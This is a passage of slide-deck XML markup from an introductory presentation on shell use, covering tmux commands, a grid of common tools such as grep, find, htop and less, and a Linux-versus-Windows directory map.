          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="Google Shape;422;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1405890"/>
            <a:ext cx="4457700" cy="3360420"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 1633"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3" name="Google Shape;423;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1611630"/>
            <a:ext cx="514350" cy="51435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424" name="Google Shape;424;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="752666" y="1678496"/>
            <a:ext cx="380619" cy="380619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Google Shape;425;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1337310" y="1680210"/>
            <a:ext cx="27432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500"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>tmux</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Google Shape;426;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2160270"/>
            <a:ext cx="4046220" cy="10972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0" i="0" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A terminal multiplexer: multiple shell sessions, split into panes and windows, inside one connection. A tmux session keeps running even if your SSH connection drops. Reconnecting picks up right where you left off.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="Google Shape;427;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3223260"/>
            <a:ext cx="188595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tmux new -s comp</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640330" y="3223260"/>
            <a:ext cx="205740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Start a new named session</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Google Shape;429;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3483864"/>
            <a:ext cx="188595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Ctrl-b d</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Google Shape;430;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640330" y="3483864"/>
            <a:ext cx="205740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Detach, leaving it running</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Google Shape;431;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3744468"/>
            <a:ext cx="188595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tmux attach -t comp</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Google Shape;432;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640330" y="3744468"/>
            <a:ext cx="205740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Reattach from anywhere</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Google Shape;433;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4005072"/>
            <a:ext cx="188595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Ctrl-b %  /  Ctrl-b "</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Google Shape;434;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640330" y="4005072"/>
            <a:ext cx="205740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Split the window into panes</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Google Shape;435;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4265676"/>
            <a:ext cx="188595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Ctrl-b c</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Google Shape;436;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640330" y="4265676"/>
            <a:ext cx="2057400" cy="2331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Open a new window</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="Google Shape;437;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006340" y="1405890"/>
            <a:ext cx="181737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8" name="Google Shape;438;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109210" y="1508760"/>
            <a:ext cx="16116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900"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="Google Shape;439;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109210" y="1817370"/>
            <a:ext cx="161163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Search text for a pattern</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6960870" y="1405890"/>
            <a:ext cx="181737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1" name="Google Shape;441;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7063740" y="1508760"/>
            <a:ext cx="16116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900"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>find</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="Google Shape;442;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7063740" y="1817370"/>
            <a:ext cx="161163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Search the filesystem for files</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Google Shape;443;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006340" y="2571750"/>
            <a:ext cx="181737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4" name="Google Shape;444;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109210" y="2674620"/>
            <a:ext cx="16116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900"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>htop</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="Google Shape;445;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109210" y="2983230"/>
            <a:ext cx="161163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Live view of running processes</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Google Shape;446;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6960870" y="2571750"/>
            <a:ext cx="181737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7" name="Google Shape;447;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7063740" y="2674620"/>
            <a:ext cx="16116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900"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>vim / nano</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="Google Shape;448;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7063740" y="2983230"/>
            <a:ext cx="161163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Command-line text editors</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="Google Shape;449;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006340" y="3737610"/>
            <a:ext cx="181737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0" name="Google Shape;450;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109210" y="3840480"/>
            <a:ext cx="16116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900"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>less</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Google Shape;451;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109210" y="4149090"/>
            <a:ext cx="161163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Page through long output</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="Google Shape;452;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6960870" y="3737610"/>
            <a:ext cx="1817370" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 53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3" name="Google Shape;453;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7063740" y="3840480"/>
            <a:ext cx="161163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900"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>history / Ctrl+R</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Google Shape;454;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7063740" y="4149090"/>
            <a:ext cx="1611630" cy="5486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Recall and search past commands</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Google Shape;455;p28"/>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Useful shell tools</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="Google Shape;456;p28"/>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1" name="Shape 461"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Google Shape;462;p29"/>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KNOW THE MAP</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Google Shape;463;p29"/>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Where everything lives: Linux vs. Windows</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Google Shape;464;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48006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5" name="Google Shape;465;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1577340"/>
            <a:ext cx="1097280" cy="308610"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 13333" name="adj"/>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6" name="Google Shape;466;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1577340"/>
            <a:ext cx="109728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Linux</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Google Shape;467;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2023110"/>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a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="Google Shape;468;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125980" y="2023110"/>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Root. Everything starts here, no drive letters.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="Google Shape;469;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2345436"/>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/home/&lt;user&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Google Shape;470;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125980" y="2345436"/>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User files</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="Google Shape;471;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2667762"/>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/etc</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Google Shape;472;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125980" y="2667762"/>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System-wide config files</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
